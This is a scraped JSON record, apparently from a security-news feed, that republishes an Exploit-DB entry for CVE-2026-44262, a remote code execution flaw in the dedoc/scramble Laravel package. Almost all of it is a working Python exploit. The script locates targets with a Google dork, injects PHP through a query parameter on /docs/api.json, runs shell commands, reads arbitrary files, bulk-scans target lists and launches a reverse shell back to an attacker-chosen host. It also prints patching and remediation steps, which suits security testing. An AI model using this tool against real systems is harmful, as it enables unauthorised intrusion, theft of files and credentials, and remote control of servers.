{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: scramble – Remote Code Execution Google Dork: inurl:\/docs\/api.json \\”dedoc\/scramble\\” Date: 2026-05-07 Exploit Author: Joshua van der Poll https:\/\/github.com\/joshuavanderpoll Vendor Homepage: https:\/\/scramble.dedoc.co Software Link:…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”scramble – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52582″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-44262″],”sourceData”:”# Exploit Title: scramble – Remote Code Execution \\r\\n# Google Dork: inurl:\/docs\/api.json \\”dedoc\/scramble\\”\\r\\n# Date: 2026-05-07\\r\\n# Exploit Author: Joshua van der Poll (https:\/\/github.com\/joshuavanderpoll)\\r\\n# Vendor Homepage: https:\/\/scramble.dedoc.co\\r\\n# Software Link: https:\/\/github.com\/dedoc\/scramble\\r\\n# Version: \\u003e=0.13.2, \\u003c0.13.22\\r\\n# Tested on: Linux 6.10.14-linuxkit (aarch64), macOS, Windows\\r\\n# CVE: CVE-2026-44262\\r\\n# Reference: https:\/\/github.com\/joshuavanderpoll\/CVE-2026-44262\\r\\n# Advisory: https:\/\/github.com\/advisories\/GHSA-4rm2-28vj-fj39\\r\\n#\\r\\n# Technique: extract() + eval() in NodeRulesEvaluator::doEvaluateExpression()\\r\\n# lets attacker overwrite Scramble’s internal $code variable with\\r\\n# arbitrary PHP via a query parameter on \/docs\/api.json.\\r\\n\\r\\nimport argparse\\r\\nimport json\\r\\nimport re\\r\\nimport readline\\r\\nimport ssl\\r\\nimport sys\\r\\nimport time\\r\\nimport urllib.error\\r\\nimport urllib.parse\\r\\nimport urllib.request\\r\\n\\r\\nDOCS_PATH = \\”\/docs\/api.json\\”\\r\\nSLEEP_SECONDS = 4\\r\\n\\r\\nPROOF_FILE_UNIX = \\”\/tmp\/scramble_rce_proof.txt\\”\\r\\nPROOF_FILE_WIN = \\”C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\scramble_rce_proof.txt\\”\\r\\n\\r\\nR = \\”\\\\033[91m\\”\\r\\nG = \\”\\\\033[92m\\”\\r\\nY = \\”\\\\033[93m\\”\\r\\nC = \\”\\\\033[96m\\”\\r\\nP = \\”\\\\033[95m\\”\\r\\nB = \\”\\\\033[1m\\”\\r\\nX = \\”\\\\033[0m\\”\\r\\n\\r\\nREPO = \\”https:\/\/github.com\/joshuavanderpoll\/CVE-2026-44262\\”\\r\\nDEFAULT_UA = f\\”Mozilla\/5.0 AppleWebKit\/537.36 (CVE-2026-44262; +{REPO})\\”\\r\\nDEFAULT_TIMEOUT = 15.0\\r\\n\\r\\n_ua = DEFAULT_UA\\r\\n_timeout = DEFAULT_TIMEOUT\\r\\n_target_os = \\”unknown\\”\\r\\n\\r\\nCTX = ssl.create_default_context()\\r\\nCTX.check_hostname = False\\r\\nCTX.verify_mode = ssl.CERT_NONE\\r\\n\\r\\n\\r\\ndef print_banner():\\r\\n print(f\\”{P}{B}\\”)\\r\\n print(r\\” _____ _____ ___ __ ___ __ _ _ _ _ ___ __ ___ \\”)\\r\\n print(r\\” \/ __\\\\ \\\\ \/ \/ __|_|_ ) \\\\_ )\/ \/ ___| | || | |_ )\/ \/|_ )\\”)\\r\\n print(r\\” | (__ \\\\ V \/| _|___\/ \/ () \/ \/\/ _ \\\\___|_ _|_ _\/ \/\/ _ \\\\\/ \/ \\”)\\r\\n print(r\\” \\\\___| \\\\_\/ |___| \/___\\\\__\/___\\\\___\/ |_| |_\/___\\\\___\/___|\\”)\\r\\n print(f\\”{X}\\”)\\r\\n print(f\\”{P}{B}{REPO}{X}\\\\n\\”)\\r\\n\\r\\n\\r\\ndef fetch(url: str, timeout: float | None = None):\\r\\n req = urllib.request.Request(url, headers={\\”User-Agent\\”: _ua})\\r\\n t = timeout if timeout is not None else _timeout\\r\\n\\r\\n try:\\r\\n with urllib.request.urlopen(req, context=CTX, timeout=t) as r:\\r\\n raw = r.headers\\r\\n headers = {k.lower(): v for k, v in raw.items()}\\r\\n # get_all handles duplicate Set-Cookie headers\\r\\n headers[\\”set-cookie-list\\”] = raw.get_all(\\”Set-Cookie\\”) or []\\r\\n return r.status, r.read().decode(errors=\\”replace\\”), headers\\r\\n except urllib.error.HTTPError as e:\\r\\n return e.code, e.read().decode(errors=\\”replace\\”), {}\\r\\n except urllib.error.URLError as e:\\r\\n return None, str(e.reason), {}\\r\\n\\r\\n\\r\\ndef info(msg):\\r\\n print(f\\”{Y}[*]{X} {msg}\\”)\\r\\n\\r\\n\\r\\ndef ok(msg):\\r\\n print(f\\”{G}[+]{X} {msg}\\”)\\r\\n\\r\\n\\r\\ndef err(msg):\\r\\n print(f\\”{R}[-]{X} {msg}\\”)\\r\\n\\r\\n\\r\\ndef proc(msg):\\r\\n print(f\\”{C}[@]{X} {msg}\\”)\\r\\n\\r\\n\\r\\ndef normalize_target(target: str) -\\u003e str:\\r\\n if not target.startswith((\\”http:\/\/\\”, \\”https:\/\/\\”)):\\r\\n target = \\”http:\/\/\\” + target\\r\\n return target.rstrip(\\”\/\\”)\\r\\n\\r\\n\\r\\ndef print_cookie_findings(cookies: list[str]):\\r\\n for raw in cookies:\\r\\n name = raw.split(\\”=\\”)[0].strip()\\r\\n value_part = raw.split(\\”=\\”, 1)[1].split(\\”;\\”)[0].strip() if \\”=\\” in raw else \\”\\”\\r\\n\\r\\n if name.upper() == \\”XSRF-TOKEN\\”:\\r\\n info(f\\”CSRF token (XSRF-TOKEN): {G}{value_part}{X}\\”)\\r\\n elif \\”session\\” in name.lower():\\r\\n info(f\\”Session cookie ‘{name}’: {G}{value_part}{X}\\”)\\r\\n else:\\r\\n info(f\\”Cookie ‘{name}’: {value_part}\\”)\\r\\n\\r\\n\\r\\ndef check_accessible(base: str) -\\u003e bool:\\r\\n url = base + DOCS_PATH\\r\\n\\r\\n proc(f\\”Probing {url}\\”)\\r\\n\\r\\n status, body, headers = fetch(url)\\r\\n\\r\\n if status is None:\\r\\n err(body)\\r\\n return False\\r\\n\\r\\n if status == 200 and ‘\\”paths\\”‘ in body:\\r\\n ok(f\\”HTTP {status} \u2014 docs accessible\\”)\\r\\n\\r\\n if server := headers.get(\\”server\\”):\\r\\n info(f\\”Server: {G}{server}{X}\\”)\\r\\n\\r\\n if powered := headers.get(\\”x-powered-by\\”):\\r\\n info(f\\”X-Powered-By: {G}{powered}{X}\\”)\\r\\n\\r\\n if cookies := headers.get(\\”set-cookie-list\\”):\\r\\n print_cookie_findings(cookies)\\r\\n\\r\\n return True\\r\\n\\r\\n err(f\\”HTTP {status} \u2014 not accessible or wrong target\\”)\\r\\n return False\\r\\n\\r\\n\\r\\ndef analyze_spec(base: str) -\\u003e tuple[list[tuple[str, str]], str | None]:\\r\\n \\”\\”\\”\\r\\n Single spec fetch \u2014 prints all discovered target info.\\r\\n Returns (vuln_params, version).\\r\\n \\”\\”\\”\\r\\n _, body, _ = fetch(base + DOCS_PATH)\\r\\n\\r\\n vuln_hits = []\\r\\n version = None\\r\\n\\r\\n # Laravel rule keywords that’d never appear as legit query param defaults\\r\\n rule_pattern = re.compile(\\r\\n r\\”^(required|nullable|string|integer|numeric|boolean|array|min:|max:|in:)\\”, re.I\\r\\n )\\r\\n\\r\\n try:\\r\\n data = json.loads(body)\\r\\n except json.JSONDecodeError:\\r\\n return vuln_hits, version\\r\\n\\r\\n info_block = data.get(\\”info\\”, {})\\r\\n version = info_block.get(\\”version\\”)\\r\\n\\r\\n if title := info_block.get(\\”title\\”):\\r\\n info(f\\”API title: {G}{title}{X}\\”)\\r\\n\\r\\n if version:\\r\\n info(f\\”API version: {G}{version}{X}\\”)\\r\\n\\r\\n if servers := data.get(\\”servers\\”):\\r\\n for s in servers:\\r\\n info(f\\”Server URL: {G}{s.get(‘url’, ‘?’)}{X}\\”)\\r\\n\\r\\n paths = data.get(\\”paths\\”, {})\\r\\n\\r\\n if paths:\\r\\n info(f\\”Endpoints discovered ({len(paths)}):\\”)\\r\\n for path, methods in paths.items():\\r\\n method_list = \\”, \\”.join(m.upper() for m in methods)\\r\\n print(f\\” {Y}{method_list}{X} {path}\\”)\\r\\n\\r\\n for path, methods in paths.items():\\r\\n for method_data in methods.values():\\r\\n for param in method_data.get(\\”parameters\\”, []):\\r\\n if param.get(\\”in\\”) != \\”query\\”:\\r\\n continue\\r\\n\\r\\n schema = param.get(\\”schema\\”, {})\\r\\n default = str(schema.get(\\”default\\”, \\”\\”))\\r\\n\\r\\n if rule_pattern.match(default) or \\”|\\” in default:\\r\\n vuln_hits.append((path, param[\\”name\\”]))\\r\\n\\r\\n return vuln_hits, version\\r\\n\\r\\n\\r\\ndef build_attack_url(base: str, param: str, payload: str) -\\u003e str:\\r\\n return base + DOCS_PATH + \\”?\\” + urllib.parse.urlencode({param: payload})\\r\\n\\r\\n\\r\\ndef capture_output(base: str, param: str, payload: str) -\\u003e str | None:\\r\\n \\”\\”\\”\\r\\n Send a PHP payload and capture output from the response body.\\r\\n Output from print\/echo appears before the JSON \u2014 everything before ‘{‘.\\r\\n \\”\\”\\”\\r\\n _, body, _ = fetch(build_attack_url(base, param, payload))\\r\\n\\r\\n json_start = body.find(\\”{\\”)\\r\\n\\r\\n if json_start == -1:\\r\\n return body.strip() or None\\r\\n\\r\\n output = body[:json_start].strip()\\r\\n return output or None\\r\\n\\r\\n\\r\\ndef probe_timing(base: str, param: str) -\\u003e bool:\\r\\n proc(f\\”Timing probe \u2014 sleep({SLEEP_SECONDS}) via param ‘{param}’\\”)\\r\\n\\r\\n t0 = time.monotonic()\\r\\n fetch(base + DOCS_PATH)\\r\\n baseline = time.monotonic() – t0\\r\\n info(f\\”Baseline: {baseline:.2f}s\\”)\\r\\n\\r\\n attack_url = build_attack_url(base, param, f\\”sleep({SLEEP_SECONDS})\\”)\\r\\n info(f\\”Payload URL: {attack_url}\\”)\\r\\n\\r\\n t0 = time.monotonic()\\r\\n fetch(attack_url, timeout=SLEEP_SECONDS + _timeout)\\r\\n elapsed = time.monotonic() – t0\\r\\n delay = elapsed – baseline\\r\\n\\r\\n info(f\\”Attack response: {elapsed:.2f}s (delay: {delay:+.2f}s)\\”)\\r\\n\\r\\n triggered = delay \\u003e= (SLEEP_SECONDS * 0.75)\\r\\n\\r\\n if triggered:\\r\\n ok(f\\”VULNERABLE \u2014 response delayed ~{SLEEP_SECONDS}s\\”)\\r\\n else:\\r\\n err(\\”Not triggered (no significant delay)\\”)\\r\\n\\r\\n return triggered\\r\\n\\r\\n\\r\\ndef probe_exec(base: str, param: str) -\\u003e bool:\\r\\n proc(f\\”Command exec probe via param ‘{param}’\\”)\\r\\n\\r\\n cmd = \\”whoami\\” if is_windows() else \\”id 2\\u003e\\u00261\\”\\r\\n output = capture_output(base, param, f\\”print(shell_exec({json.dumps(cmd)}))\\”)\\r\\n\\r\\n if output:\\r\\n ok(\\”VULNERABLE \u2014 command output captured:\\”)\\r\\n print(f\\”\\\\n {B}{output}{X}\\\\n\\”)\\r\\n return True\\r\\n\\r\\n err(\\”No command output in response (not vulnerable via this vector)\\”)\\r\\n return False\\r\\n\\r\\n\\r\\ndef detect_os(base: str, param: str):\\r\\n global _target_os\\r\\n\\r\\n raw = capture_output(base, param, \\”print(php_uname(‘s’))\\”)\\r\\n\\r\\n if not raw:\\r\\n return\\r\\n\\r\\n lower = raw.strip().lower()\\r\\n\\r\\n if \\”windows\\” in lower:\\r\\n _target_os = \\”windows\\”\\r\\n elif \\”linux\\” in lower:\\r\\n _target_os = \\”linux\\”\\r\\n elif \\”darwin\\” in lower:\\r\\n _target_os = \\”darwin\\”\\r\\n else:\\r\\n _target_os = raw.strip()\\r\\n\\r\\n info(f\\”Target OS: {G}{_target_os}{X}\\”)\\r\\n\\r\\n\\r\\ndef is_windows() -\\u003e bool:\\r\\n return _target_os == \\”windows\\”\\r\\n\\r\\n\\r\\ndef proof_file() -\\u003e str:\\r\\n return PROOF_FILE_WIN if is_windows() else PROOF_FILE_UNIX\\r\\n\\r\\n\\r\\ndef shell_binary() -\\u003e str:\\r\\n return \\”cmd.exe\\” if is_windows() else \\”\/bin\/sh\\”\\r\\n\\r\\n\\r\\ndef print_output_block(output: str):\\r\\n print(f\\”\\\\n{B}{‘\u2500’ * 65}{X}\\”)\\r\\n print(output)\\r\\n print(f\\”{B}{‘\u2500’ * 65}{X}\\\\n\\”)\\r\\n\\r\\n\\r\\ndef run_command(base: str, param: str, cmd: str):\\r\\n proc(f\\”Executing: {cmd}\\”)\\r\\n\\r\\n # 2\\u003e\\u00261 merges stderr into stdout so errors show up in output\\r\\n cmd_with_stderr = cmd if \\”2\\u003e\\” in cmd else cmd + \\” 2\\u003e\\u00261\\”\\r\\n output = capture_output(base, param, f\\”print(shell_exec({json.dumps(cmd_with_stderr)}))\\”)\\r\\n\\r\\n if output is not None:\\r\\n print_output_block(output)\\r\\n else:\\r\\n err(\\”No output (command may have failed silently)\\”)\\r\\n\\r\\n\\r\\ndef run_code(base: str, param: str, code: str):\\r\\n proc(\\”Executing raw PHP code\\”)\\r\\n\\r\\n # closure makes multi-statement code a single eval-able expression\\r\\n wrapped = f\\”(function(){{ {code} }})()\\”\\r\\n output = capture_output(base, param, wrapped)\\r\\n\\r\\n if output is not None:\\r\\n print_output_block(output)\\r\\n else:\\r\\n err(\\”No output returned\\”)\\r\\n\\r\\n\\r\\ndef run_read_file(base: str, param: str, path: str):\\r\\n proc(f\\”Reading file: {path}\\”)\\r\\n\\r\\n output = capture_output(base, param, f\\”print(file_get_contents({json.dumps(path)}))\\”)\\r\\n\\r\\n if output is not None:\\r\\n ok(f\\”Contents of {path}:\\”)\\r\\n print_output_block(output)\\r\\n else:\\r\\n err(\\”No output \u2014 file may not exist or not readable\\”)\\r\\n\\r\\n\\r\\ndef run_reverse_shell(base: str, param: str, lhost: str, lport: int):\\r\\n \\”\\”\\”\\r\\n PHP eval-loop reverse shell \u2014 no bash or busybox required.\\r\\n Connects back to lhost:lport and executes PHP code sent over the socket.\\r\\n \\”\\”\\”\\r\\n info(f\\”Starting listener on your end:\\”)\\r\\n print(f\\”\\\\n {B}nc -lvnp {lport}{X}\\\\n\\”)\\r\\n\\r\\n proc(f\\”Sending reverse shell payload to {lhost}:{lport}\\”)\\r\\n\\r\\n shell = shell_binary()\\r\\n\\r\\n # proc_open pipes shell stdin\/stdout\/stderr directly to the socket\\r\\n payload = (\\r\\n f\\”(function(){{\\”\\r\\n f\\”$s=@fsockopen(‘{lhost}’,{lport},$e,$m,30);\\”\\r\\n f\\”if(!$s)return;\\”\\r\\n f\\”$p=proc_open({json.dumps(shell)},array(0=\\u003e$s,1=\\u003e$s,2=\\u003e$s),$pipes);\\”\\r\\n f\\”if($p)proc_close($p);\\”\\r\\n f\\”fclose($s);\\”\\r\\n f\\”}})()\\”\\r\\n )\\r\\n\\r\\n # fire and forget \u2014 connection hangs until shell is done\\r\\n fetch(build_attack_url(base, param, payload), timeout=3600)\\r\\n\\r\\n\\r\\ndef run_check(base: str, skip_os_detect: bool = False):\\r\\n \\”\\”\\”Non-breaking check \u2014 timing probe only, no command execution.\\”\\”\\”\\r\\n if not check_accessible(base):\\r\\n err(\\”Docs not accessible.\\”)\\r\\n return False\\r\\n\\r\\n print()\\r\\n proc(\\”Analyzing OpenAPI spec…\\”)\\r\\n print()\\r\\n\\r\\n vuln_params, _ = analyze_spec(base)\\r\\n print()\\r\\n\\r\\n if not vuln_params:\\r\\n err(\\”No vulnerable parameters detected in spec\\”)\\r\\n return False\\r\\n\\r\\n ok(f\\”Found {len(vuln_params)} potentially vulnerable parameter(s):\\”)\\r\\n for path, pname in vuln_params:\\r\\n print(f\\” {Y}{path}{X} \u2192 param ‘{B}{pname}{X}’\\”)\\r\\n\\r\\n print()\\r\\n\\r\\n _, param = vuln_params[0]\\r\\n\\r\\n if not skip_os_detect:\\r\\n detect_os(base, param)\\r\\n print()\\r\\n\\r\\n return probe_timing(base, param)\\r\\n\\r\\n\\r\\ndef print_header(base: str):\\r\\n print(f\\”\\\\n{B}{‘=’ * 65}{X}\\”)\\r\\n print(f\\”{B} GHSA-4rm2-28vj-fj39 \u2014 dedoc\/scramble RCE checker{X}\\”)\\r\\n print(f\\” Target: {C}{base}{X}\\”)\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\\\n\\”)\\r\\n\\r\\n\\r\\ndef print_summary(base: str, param: str, timing: bool, exec_: bool):\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\”)\\r\\n print(f\\”{B} SUMMARY{X}\\”)\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\”)\\r\\n print(f\\” Target: {C}{base}{X}\\”)\\r\\n print(f\\” Vuln param: {param}\\”)\\r\\n print(f\\” Timing probe: {‘%sTRIGGERED%s’ % (G, X) if timing else ‘clean’}\\”)\\r\\n print(f\\” Exec probe: {‘%sTRIGGERED%s’ % (G, X) if exec_ else ‘clean’}\\”)\\r\\n\\r\\n vulnerable = timing or exec_\\r\\n\\r\\n if vulnerable:\\r\\n print(f\\”\\\\n {R}{B}Verdict: *** VULNERABLE *** (RCE confirmed){X}\\”)\\r\\n print(f\\”\\\\n {Y}Remediation:{X}\\”)\\r\\n print(f\\” {B}1. Patch (recommended){X}\\”)\\r\\n print(\\” composer require dedoc\/scramble:^0.13.22\\”)\\r\\n print(f\\” {B}2. Restrict docs access{X}\\”)\\r\\n print(\\” Add RestrictedDocsAccess middleware in config\/scramble.php:\\”)\\r\\n print(\\” ‘middleware’ =\\u003e [‘web’, RestrictedDocsAccess::class]\\”)\\r\\n print(f\\” {B}3. Disable docs in production{X}\\”)\\r\\n print(\\” Remove Scramble::routes() from AppServiceProvider or\\”)\\r\\n print(\\” wrap registration in: if (app()-\\u003eisLocal()) { … }\\”)\\r\\n print(f\\” {B}4. Block at web server level{X}\\”)\\r\\n print(\\” Deny access to \/docs and \/docs\/api.json for external IPs\\”)\\r\\n print()\\r\\n print(f\\” {Y}\u2b50 If this tool helped you, consider starring the repo: {B}{Y}{REPO}{X}\\”)\\r\\n else:\\r\\n print(f\\”\\\\n {G}Verdict: Not exploitable via this vector{X}\\”)\\r\\n\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\\\n\\”)\\r\\n\\r\\n return vulnerable\\r\\n\\r\\n\\r\\ndef main():\\r\\n global _ua, _timeout, _target_os\\r\\n\\r\\n parser = argparse.ArgumentParser(description=\\”GHSA-4rm2-28vj-fj39 \u2014 dedoc\/scramble RCE\\”)\\r\\n\\r\\n target_group = parser.add_mutually_exclusive_group(required=True)\\r\\n target_group.add_argument(\\”–target\\”, help=\\”Target URL\\”)\\r\\n target_group.add_argument(\\”–targets\\”, metavar=\\”FILE\\”, help=\\”File with one target URL per line\\”)\\r\\n\\r\\n parser.add_argument(\\”–check\\”, action=\\”store_true\\”, help=\\”Safe non-breaking check only (timing probe, no command execution)\\”)\\r\\n parser.add_argument(\\”–command\\”, metavar=\\”CMD\\”, help=\\”Execute a shell command and print output\\”)\\r\\n parser.add_argument(\\”–code\\”, metavar=\\”PHP\\”, help=\\”Execute raw PHP code and print output\\”)\\r\\n parser.add_argument(\\”–read-file\\”, metavar=\\”PATH\\”, help=\\”Read a file from the target filesystem\\”)\\r\\n parser.add_argument(\\”–shell\\”, action=\\”store_true\\”, help=\\”Start a PHP eval reverse shell (requires –lhost and –lport)\\”)\\r\\n parser.add_argument(\\”–lhost\\”, metavar=\\”HOST\\”, help=\\”Listener host for reverse shell\\”)\\r\\n parser.add_argument(\\”–lport\\”, metavar=\\”PORT\\”, type=int, help=\\”Listener port for reverse shell\\”)\\r\\n parser.add_argument(\\”–os\\”, choices=[\\”windows\\”, \\”linux\\”, \\”darwin\\”], metavar=\\”OS\\”,\\r\\n help=\\”Force target OS (windows\/linux\/darwin) \u2014 skips auto-detection. \\”\\r\\n \\”Affects shell binary (cmd.exe vs \/bin\/sh), proof file path, and exec probe command.\\”)\\r\\n parser.add_argument(\\”–useragent\\”, default=DEFAULT_UA, help=\\”Custom User-Agent string\\”)\\r\\n parser.add_argument(\\”–timeout\\”, type=float, default=DEFAULT_TIMEOUT, metavar=\\”SECONDS\\”, help=\\”Request timeout in seconds (default: 15)\\”)\\r\\n args = parser.parse_args()\\r\\n\\r\\n _ua = args.useragent\\r\\n _timeout = args.timeout\\r\\n\\r\\n if args.os:\\r\\n _target_os = args.os\\r\\n info(f\\”OS forced: {G}{_target_os}{X}\\”)\\r\\n\\r\\n if args.shell and (not args.lhost or not args.lport):\\r\\n print(f\\”{R}[-]{X} –shell requires –lhost and –lport\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n print_banner()\\r\\n\\r\\n # bulk check mode\\r\\n if args.targets:\\r\\n try:\\r\\n with open(args.targets) as f:\\r\\n targets = [normalize_target(l.strip()) for l in f if l.strip()]\\r\\n except FileNotFoundError:\\r\\n err(f\\”Targets file not found: {args.targets}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n results = []\\r\\n\\r\\n for target in targets:\\r\\n print_header(target)\\r\\n vulnerable = run_check(target, skip_os_detect=bool(args.os))\\r\\n results.append((target, vulnerable))\\r\\n print()\\r\\n\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\”)\\r\\n print(f\\”{B} BULK SCAN RESULTS{X}\\”)\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\”)\\r\\n\\r\\n for target, vuln in results:\\r\\n status = f\\”{R}{B}VULNERABLE{X}\\” if vuln else f\\”{G}clean{X}\\”\\r\\n print(f\\” {status} {target}\\”)\\r\\n\\r\\n print(f\\”{B}{‘=’ * 65}{X}\\\\n\\”)\\r\\n sys.exit(0)\\r\\n\\r\\n base = normalize_target(args.target)\\r\\n\\r\\n print_header(base)\\r\\n\\r\\n # safe check mode \u2014 no exploit\\r\\n if args.check:\\r\\n vulnerable = run_check(base, skip_os_detect=bool(args.os))\\r\\n sys.exit(1 if vulnerable else 0)\\r\\n\\r\\n # full detection + exploit path\\r\\n if not check_accessible(base):\\r\\n err(\\”Docs not accessible \u2014 cannot continue.\\”)\\r\\n sys.exit(0)\\r\\n\\r\\n print()\\r\\n proc(\\”Analyzing OpenAPI spec…\\”)\\r\\n print()\\r\\n\\r\\n vuln_params, _ = analyze_spec(base)\\r\\n print()\\r\\n\\r\\n if not vuln_params:\\r\\n err(\\”No vulnerable parameters detected in spec\\”)\\r\\n sys.exit(0)\\r\\n\\r\\n ok(f\\”Found {len(vuln_params)} potentially vulnerable parameter(s):\\”)\\r\\n for path, pname in vuln_params:\\r\\n print(f\\” {Y}{path}{X} \u2192 param ‘{B}{pname}{X}’\\”)\\r\\n\\r\\n print()\\r\\n\\r\\n _, param = vuln_params[0]\\r\\n\\r\\n if not args.os:\\r\\n detect_os(base, param)\\r\\n print()\\r\\n\\r\\n if args.command:\\r\\n run_command(base, param, args.command)\\r\\n sys.exit(0)\\r\\n\\r\\n if args.code:\\r\\n run_code(base, param, args.code)\\r\\n sys.exit(0)\\r\\n\\r\\n if args.read_file:\\r\\n run_read_file(base, param, args.read_file)\\r\\n sys.exit(0)\\r\\n\\r\\n if args.shell:\\r\\n run_reverse_shell(base, param, args.lhost, args.lport)\\r\\n sys.exit(0)\\r\\n\\r\\n # default \u2014 full detection probes\\r\\n timing_result = probe_timing(base, param)\\r\\n print()\\r\\n exec_result = probe_exec(base, param)\\r\\n print()\\r\\n\\r\\n vulnerable = print_summary(base, param, timing_result, exec_result)\\r\\n sys.exit(1 if vulnerable else 0)\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52582″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52582″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-27T13:27:56″,”description”:”Exploit Title: scramble – Remote Code Execution Google Dork: inurl:\/docs\/api.json \\”dedoc\/scramble\\” Date: 2026-05-07 Exploit Author: Joshua van der Poll https:\/\/github.com\/joshuavanderpoll Vendor Homepage: https:\/\/scramble.dedoc.co Software Link:…”,”published”:”2026-05-27T00:00:00″,”modified”:”2026-05-27T00:00:00″,”type”:”exploitdb”,”title”:”scramble…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,40,13,7,11,5],"class_list":["post-57396","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n